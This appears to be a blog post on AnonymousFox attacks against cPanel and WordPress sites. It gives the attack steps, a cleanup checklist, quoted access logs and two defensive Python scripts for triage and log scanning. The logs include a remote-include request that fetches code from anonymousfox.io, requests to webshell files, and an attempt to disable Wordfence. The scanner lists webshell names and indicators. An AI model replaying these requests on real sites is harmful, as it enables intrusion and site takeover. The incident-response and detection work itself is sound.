New AnonymousFox attacks emerged this month, affecting cPanel based sites.
Next, I will detail how the attack develops:
1. Using malicious scripts injected via WordPress, the .contactemail file is edited.
2. The cPanel password is changed using a newly created email, [email protected]
Alternatively, secondary email accounts are created, like [email protected]
3. WordPress users with administrator privileges are created.
Look for a “guest” username.
4. Malicious WordPress plugins are added, which are then used to manage files.
What to do when dealing with an AnonymousFox hack?
- Don’t panic.
- Ask your web host to perform a backup, which will include database, emails and web files.
- Download a backup copy on your local computer, to secure the latest working site version.
- Disable all active sites.
- If your tech knowledge is limited, ask your web host to temporarily suspend your cPanel.
- Check for newly created subdomains.
- Go to cPanel > Contact Information and change primary and secondary email and restore Pushbullet token.
- Remove all FTP accounts under FTP Accounts.
- Remove all suspicious email accounts under Email Accounts.
- Move all files under /home/user/public_html/ to a safe area.
- If you have addon sites or subdomains, move each of them to a safe area as well, outside public access.
- Clean your WordPress site. A recent guide available here: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
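A local triage script covering the checklist items that can be verified from the account's home directory: the contact addresses, plugin directories that were created or changed recently, and recently modified PHP files under public_html. This is an added example, not code from the article or from cPanel; it assumes cPanel keeps the contact addresses in ~/.contactemail separated by commas or newlines, treats "recent" as 30 days, and builds its own throwaway sample home directory with placeholder addresses and the plugin directory name taken from the logs in this post.

```python
"""Local triage for the cleanup checklist: verify the cPanel contact addresses and
list plugin directories and PHP files changed recently.
Added example, not code from the original article. Assumptions: cPanel stores the
contact addresses in ~/.contactemail separated by commas or newlines; 'recent'
means within max_age_days; the sample home directory below is constructed."""
import os
import re
import tempfile
import time
from pathlib import Path

DAY = 86400


def check_contact_email(home, expected):
    """Compare ~/.contactemail against the addresses the owner knows about."""
    f = Path(home) / ".contactemail"
    if not f.exists():
        return {"present": False, "unexpected": [], "missing": sorted(expected)}
    current = {a for a in re.split(r"[,\s]+", f.read_text()) if a}
    return {"present": True,
            "unexpected": sorted(current - set(expected)),   # addresses the owner never added
            "missing": sorted(set(expected) - current)}      # addresses that were removed


def recent_plugin_dirs(public_html, max_age_days=30, now=None):
    """Plugin directories containing any file modified within max_age_days."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * DAY
    plugins = Path(public_html) / "wp-content" / "plugins"
    hits = []
    for d in sorted(p for p in plugins.iterdir() if p.is_dir()):
        newest = max((f.stat().st_mtime for f in d.rglob("*") if f.is_file()),
                     default=d.stat().st_mtime)
        if newest >= cutoff:
            hits.append(d.name)
    return hits


def recent_php_files(public_html, max_age_days=30, now=None):
    """PHP files anywhere under public_html modified within max_age_days."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * DAY
    root = Path(public_html)
    return sorted(f.relative_to(root).as_posix() for f in root.rglob("*.php")
                  if f.is_file() and f.stat().st_mtime >= cutoff)


def _write(path, text, mtime):
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)
    os.utime(path, (mtime, mtime))


def build_sample_home():
    """Constructed cPanel home directory reproducing the symptoms from the checklist."""
    home = Path(tempfile.mkdtemp())
    old = time.time() - 400 * DAY   # untouched for over a year
    fresh = time.time()             # touched just now
    # contact file: the owner's address plus one the owner never added (placeholder address)
    _write(home / ".contactemail", "owner@example.com, attacker@example.invalid\n", fresh)
    ph = home / "public_html"
    _write(ph / "wp-login.php", "<?php // core file, unchanged\n", old)
    _write(ph / "wp-content/plugins/akismet/akismet.php", "<?php // legitimate plugin\n", old)
    # randomly named plugin directory with a dropped file, named as in the logs of this post
    _write(ph / "wp-content/plugins/erwvxqtoto/wso.php", "<?php // placeholder content\n", fresh)
    return home


if __name__ == "__main__":
    home = build_sample_home()
    print(check_contact_email(home, {"owner@example.com"}))
    print(recent_plugin_dirs(home / "public_html"))
    print(recent_php_files(home / "public_html"))
```

On a real account, run it as the cPanel user against the real home directory and pass the addresses you actually registered; anything listed under "unexpected" is an address an attacker could have used for the password reset described above, and every directory or file reported as recent deserves a look before files are moved out of public_html.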
cPanelLauren – “The anonymousfox vulnerability, caused by running vulnerable scripts on a cPanel account, does not allow for root access.
Allowing vulnerable content on the server which in turn allows a way for an attacker to obtain access to the cPanel password reset does not constitute a bug.
What ultimately should be done here is remove the vulnerable content.”
Anonymous Fox has an official website, where members describe the current tools used for the attacks.
Part 1: https://www.youtube.com/watch?v=IWsi1BGKqXA
Part 2: https://www.youtube.com/watch?v=5wcNvqhj7_E
Part 3: https://www.youtube.com/watch?v=ZvJp86xpcFU
18.104.22.168 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200
22.214.171.124 - - [02/Apr/2021:01:16:58 +1100] "GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200 3703 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
[06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:06:16:58 +1100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200
[06/Mar/2021:06:17:05 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/1.1" 200
[06/Mar/2021:23:27:12 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/2" 200
[06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:23:27:18 +1100] "POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 157 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[29/Mar/2021:02:26:41 +1100] "GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1" 200 3570 "https://example.com/wp-content/plugins/erwvxqtoto/up.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
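To turn the log excerpts above into something that can be run over a whole access log, here is an added detection example (not code from the article). It parses Apache combined-format lines, flags the per-line indicators visible in the excerpts (the misspelled "Mozlila"/"Bulid"/"Moblie" user agent, a php= parameter carrying a remote URL, a plugin upload through wp-admin, deactivation of a security plugin, requests to the dropped file names), and correlates a successful plugin upload with the first request into a previously unseen plugin directory. The watch-list of security-plugin slugs, the dropped-file name list and the 5-minute correlation window are this example's own assumptions; the sample lines are the article's, reproduced with straight quotes.

```python
"""Indicator scan over the access-log lines quoted above.
Added example, not code from the original article. The indicator rules and the
5-minute upload-to-first-request window are this example's assumptions; the
sample lines are the article's, reproduced with straight quotes."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

SAMPLE_LOG = r'''
18.104.22.168 - - [02/Apr/2021:07:01:10 +1100] "POST /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200
22.214.171.124 - - [02/Apr/2021:01:16:58 +1100] "GET /wp-content/plugins/erwvxqtoto/alwso.php HTTP/1.1" 200 3703 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
[06/Mar/2021:06:16:50 +1100] "GET /wp-admin/plugins.php?action=deactivate&plugin=wordfence/wordfence.php&plugin_status=all&paged=1&s&_wpnonce=ffdf55bc02 HTTP/1.1" 403 1167 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:06:16:58 +1100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200
[06/Mar/2021:06:17:05 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/1.1" 200
[06/Mar/2021:23:27:12 +1100] "GET /wp-content/plugins/llmrhps/data.php HTTP/2" 200
[06/Mar/2021:23:27:15 +1100] "GET /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 100 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[06/Mar/2021:23:27:18 +1100] "POST /wp-content/plugins/llmrhps/hsxltviago.php?php=http://anonymousfox.io/v4/v4.txt HTTP/1.1" 200 157 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
[29/Mar/2021:02:26:41 +1100] "GET /wp-content/plugins/erwvxqtoto/wso.php HTTP/1.1" 200 3570 "https://example.com/wp-content/plugins/erwvxqtoto/up.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
'''

# Apache combined format; the client field and the trailing size/referer/agent
# are optional because several of the quoted lines are truncated.
LOG_RE = re.compile(
    r'^(?:(?P<ip>\S+) \S+ \S+ )?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
    r'(?: (?:\d+|-))?(?: "(?P<referer>[^"]*)")?(?: "(?P<ua>[^"]*)")?')

SECURITY_PLUGINS = {"wordfence", "sucuri-scanner", "better-wp-security",
                    "all-in-one-wp-security-and-firewall"}   # assumed watch-list of slugs
SHELL_NAMES = {"wso.php", "alwso.php", "up.php", "data.php"}  # file names seen in the logs above
UPLOAD_WINDOW = timedelta(minutes=5)                           # assumed correlation window


def parse_line(line):
    """Parse one log line into a dict, or return None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def plugin_dir(path):
    """Directory name for /wp-content/plugins/<dir>/..., else None."""
    parts = path.split("/")
    return parts[3] if len(parts) >= 5 and parts[1:3] == ["wp-content", "plugins"] else None


def line_indicators(rec):
    """Per-line indicators; each returned string is one reason the line is suspicious."""
    hits = []
    if re.search(r"Mozlila|Bulid/|Moblie", rec.get("ua") or ""):
        hits.append("typo-squatted user agent")
    if any(v.startswith(("http://", "https://")) for v in rec["query"].get("php", [])):
        hits.append("remote include via php= parameter")
    if rec["path"] == "/wp-admin/update.php" and rec["query"].get("action") == ["upload-plugin"]:
        hits.append("plugin upload")
    if rec["path"] == "/wp-admin/plugins.php" and rec["query"].get("action") == ["deactivate"]:
        for p in rec["query"].get("plugin", []):
            if p.split("/")[0] in SECURITY_PLUGINS:
                hits.append("security plugin deactivation: " + p)
    d = plugin_dir(rec["path"])
    if d and rec["path"].rsplit("/", 1)[-1] in SHELL_NAMES:
        hits.append("webshell-style file in plugin dir " + d)
    ref_path = urlparse(rec.get("referer") or "").path
    if ref_path.rsplit("/", 1)[-1] in SHELL_NAMES:
        hits.append("referred from webshell-style file " + ref_path)
    return hits


def scan(log_text):
    """Return (timestamp, method, path, reason) tuples in time order, adding the
    upload-then-new-plugin-directory correlation across lines."""
    recs = [r for r in map(parse_line, log_text.strip().splitlines()) if r]
    recs.sort(key=lambda r: r["time"])
    findings, seen_dirs, last_upload = [], set(), None
    for rec in recs:
        hits = line_indicators(rec)
        d = plugin_dir(rec["path"])
        if d and d not in seen_dirs:
            seen_dirs.add(d)
            if last_upload is not None and rec["time"] - last_upload <= UPLOAD_WINDOW:
                delay = int((rec["time"] - last_upload).total_seconds())
                hits.append("new plugin dir %s requested %ds after plugin upload" % (d, delay))
        if "plugin upload" in hits and rec["status"] == "200":
            last_upload = rec["time"]
        findings.extend((rec["ts"], rec["method"], rec["path"], h) for h in hits)
    return findings


if __name__ == "__main__":
    for ts, method, path, reason in scan(SAMPLE_LOG):
        print(ts, method, path, "->", reason)
```

Two design points: the Wordfence deactivation request is flagged even though it returned 403, because a blocked attempt is still evidence of who was logged into wp-admin at that moment; and the correlation rule keys on the first request into a plugin directory that the log has never seen before, so on a real log you should feed it a long enough history that legitimate plugins have already been "seen" before any upload event.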